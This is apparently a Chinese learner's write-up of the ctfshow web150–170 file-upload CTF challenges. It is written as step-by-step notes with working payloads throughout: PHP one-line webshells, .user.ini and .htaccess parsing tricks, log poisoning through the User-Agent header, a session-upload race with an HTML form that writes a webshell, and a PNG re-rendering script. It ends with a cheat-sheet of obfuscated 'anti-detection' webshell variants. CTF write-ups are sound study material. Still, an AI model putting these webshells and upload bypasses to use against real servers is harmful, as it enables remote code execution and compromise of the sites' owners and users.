ctfshow_web 入门 文件上传

文件上传

还是是一边学习一边做笔记的文章，由于是学习，所以会显得啰嗦
还请各位师傅担待~
如果有不正确的地方，请师傅们斧正_{谢谢师傅们}

web150

火狐关闭js的插件一旦开启，就没法点击上传按钮了。

而且这里没法上传.php .jpg等后缀文件，只能选择png格式图片。所以只能以够抓包然后修改内容的方式上传图片马。

同时，一旦图片格式满足，就自动上传了。

打开burp开启，然后上传一张png格式图片，在burp抓的包中添加一句话木马<?php eval($_POST['cmd']);?>，修改图片后缀为.php上传

访问对应网页即可

web151

同web150

web152

首先尝试上传php后缀文件，发现不行。所以上传.user.ini配置文件，因为是nginx系统，所以配置文件是.user.ini，.htaccess和.user.ini配置文件妙用

同样，上传png文件，burp抓包修改文件信息（将信息传入repeater之后可以反复修改，反复提交），文件名修改为.user.ini，内容添加auto_prepend_file=meima.png。再上传一个名为meima.png的图片马即可

最后访问/url/upload/index.php，用cmd=system('tac /var/www/html/f*');输入命令获取flag就好

web 154

同样，先上传.user.ini，内容auto_prepend_file=meima.png，接着上传名为meima.png的图片马。

就可以利用上一关的repeater中的数据包，将host给修改一下就可以。

.user.ini

auto_prepend_file=meima.png

同时，图片马：

meima.png

<?= eval($_POST['cmd']);?>

同样，在火狐中，将host给修改一下，继续执行即可，命令都不需要改

web 155

嫖web154，操作完全一致

web 156

为啥我上传没有马的png也不行呢？哦，原来是文件内容太长了。

整一个短一点的马儿或者是将抓到的包的信息给改少一点。

过滤了[]，用{}进行绕过

因为之前上传过一次

<? `tac /var/www/html/f*`;?>	也可能是没有加echo，这个有点不太清楚

但是显示结果却是：no thing here ,所以这里打算复盘一下，用webshell，写一个php文件进去测试；最后用蚁剑连接之后发现，创建了文件，但是文件中没有内容

最后可以直接用蚁剑写入文件，

所以说，在``之前是需要加上echo 的；

``相当于是shell_exec()函数

同样，也可以直接从burp中修改命令，然后反复上传以达到目的，原来的文件会被替换掉

web 157

额，看样子貌似是过滤了；，可以上传拿到flag

<? echo `tac /var/www/html/f*`?>

PHP最后一句可以不用加;，貌似只是针对这种逻辑简单的可以不加，一些逻辑比较复杂的代码最后还是是需要加的

web 158

用157的方法，直接拿下

web 159

貌似过滤了system或者()

用157的方法，直接拿下

web 160

这个题过滤了空格 ()

额，还记得文件包含的web82不，那个上传session文件的解题方式，这题也用那个方式

一共要准备四个包；

一个上传.user.ini文件上传包，一个1.png文件上传包；一个url/upload/index.php反复请求包，一个session反复上传包；

接着条件竞争，

一个burp一直请求/url/upload/index.php

另一边，一直上传文件

访问/url/test1.php，如果有页面就成功，没有就失败，重来一次就行

拿到flag

Firebasky师傅的wp中提到，auto_prepend_file的配置相当于文件包含。

web 161

有文件头的一个判断，选择GIF89a的文件头，比较方便记忆与绕过

顺带看一下，图片有没有被修改，发现，（我们的图安然无恙！）

在文件头前面加上GIF89a，然后就可以白嫖web160的方法了

方法二：日志包含

在user-agent中加入一句话木马，然后在图片中加入引入日志文件的代码

在配置文件.user.ini中，将auto_prepend_file设置为：1.png

接着访问url/upload/index.php，那么就会执行1.png的代码，由于1.png引入日志文件，那么日志文件中的一句话木马就会被执行

突然想问一句，既然auto_prepend_file能进行文件包含，那么是不是可以直接从auto_prepend_file入手日志文件呢？不行

web 162

过滤了.，但是发现，可以直接上传，可以白嫖上面的方法，上传文件1的时候，文件内容一定要少

web 163

发现一个以前没有注意过的点：
如果是用数字来作为post数组的键时，不能够用引号括起来，不然利用session写入木马时会无法写入

所以所以这里就卡了很久，但是依旧没有上传请求成功

web 164（png图片二次渲染）

这个题怎么说呢，没有发现有一个download.php文件，所以也就不知道怎么去做。

所以我这里也就直接照搬做出来的大佬的笔记了

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'1.png'); #保存在本地的图片马
?>

上传图片成功之后，访问url/download.php?iamge=xxxx&0=system post传入：1=cat flag.php

就可以得到flag

web 165

jpg图片渲染用164脚本依旧可行，只是我这里一直上传不了

web 166

上传zip文件，在zip文件中写入一句话，通过download.php进行下载，然后rce

由于下载时是GET方式，所以之类马儿里也用的get方式

这里注意到download.php，就顺带看了一下，因为最之前不知道如何通过download.php进行文件包含的，哦~原来里面有一个include($file)

web 167

看到httpd，想到是不是Apache。于是F12通过network查看，

上传.htaccess，这题需要上传jpg格式的马儿，同时写入

AddType application/x-httpd-php .jpg

？为什么我开的题目环境一直出问题？？？

不过按理来说，访问/url/upload/1.jpg即可；

原来是配置文件解析错误，上传的配置文件中，只写一句和解析有关的就够了，多余的删除，否则会有500的错误

大佬的wp

web 168

可以直接上传.php文件

查看flag，反引号是shell_exec()函数的简写；需要用echo来进行输出

看了羽师傅博客，又l了解到了很多：

<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

<?php
$a=strrev('metsys');
$a($_REQUEST[1]);
?>

<?php
$a=$_REQUEST['a'];
$b=$_REQUEST['b'];
$a($b);
?>

web 169

直接将<过滤了，所以也没有办法执行PHP代码，于是这题考虑日志包含

同时，上传时，需要burp抓包上传，上传zip文件，并且将file_content修改为image/png才能成功上传

在user-agent中写入一句话木马，<?php eval($_POST['cmd']);?>

上传一个.user.ini文件，auto_prepend_file=/var/log/nginx/access.log

上传一个1.php文件，内容随便写123，因为url/upload/目录下没有文件，所以需要写一个文件来承接.user.ini

接着就可以访问/url/upload/1.php，然后rce

也可以用蚁剑连接，方便找flag。

web 170

同上

解题

上传配置文件，然后传马

马儿内容

短标签马儿：
	一般的马儿：
<?php eval($_POST['cmd']);?>
	没有PHP的马儿
<?= eval($_POST['cmd']);?>
<? eval($_POST['cmd']);?>
<% eval($_POST['cmd']);%>
	有PHP的马儿
<script language="php"></script>

特殊马儿：
	过滤[]：用{}代替
	<?= eval($_POST['cmd']);?>

直接拿flag的变形马儿
	<? echo `tac /var/www/html/f*`;?>
	<? echo `tac /var/www/html/f*`?>
	
免杀马儿：
<?php
$a = "s#y#s#t#e#m";
$b = explode("#",$a);
$c = $b[0].$b[1].$b[2].$b[3].$b[4].$b[5];
$c($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

<?php
$a=substr('1s',1).'ystem';
$a($_REQUEST[1]);
?>

上传配置文件，上传sessionid的马儿

.user.ini文件中写入auto_prepend_file=1.png

1.png中写入<?include"/tmp/sess_test"?>，此处sess_test中的test是PHPSESSIDd的值

uplaod_session.php

<html>
<body>
<form action="http://fece0c1e-a60a-49b8-afde-a015f784c864.challenge.ctf.show:8080/" method="post" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php file_put_contents('/var/www/html/test1.php','<?php eval($_POST[1]);?>')?>">
<input type="file" name="file">
<input type="submit" value="submit">
</form>
</body>
</html>
此处代码，抓包后在cookie位置添加：PHPSESSID=test

格式

GIF89a

注意：

发现一个以前没有注意过的点：
如果是用数字来作为post数组的键时，不能够用引号括起来，不然利用session写入木马时会无法写入

谢谢师傅们观看~